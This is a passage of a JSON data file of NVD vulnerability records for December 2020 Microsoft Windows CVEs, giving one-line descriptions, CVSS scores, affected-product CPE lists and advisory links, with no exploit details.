"cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": 
"2022-03-23T14:27:26", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16958", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", 
"cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16958", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16958", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:52", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16964", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16964", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16964", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:32", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17134, CVE-2020-17136.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17103", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", 
"cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17103", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17103", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:16", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17134.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17136", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17136", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:arm64:*", 
"cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*"]}, {"lastseen": "2022-03-23T14:35:13", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17136.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17134", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", 
"cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17134", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*"]}, {"lastseen": "2022-03-23T14:34:15", "description": "Windows Error Reporting Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17138.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17094", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17094", "CVE-2020-17138"], "modified": "2021-03-03T21:34:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17094", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17094", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:19", "description": "Windows Error Reporting Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17094.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17138", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17094", "CVE-2020-17138"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2020-17138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17138", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": 
["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:16", "description": "DirectX Graphics Kernel Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17137", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17137"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004"], "id": "CVE-2020-17137", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17137", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", 
"cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*"]}, {"lastseen": "2022-03-23T14:34:23", "description": "Windows Lock Screen Security Feature Bypass Vulnerability", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17099", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17099"], "modified": "2021-03-03T21:51:00", "cpe": ["cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17099", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17099", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", 
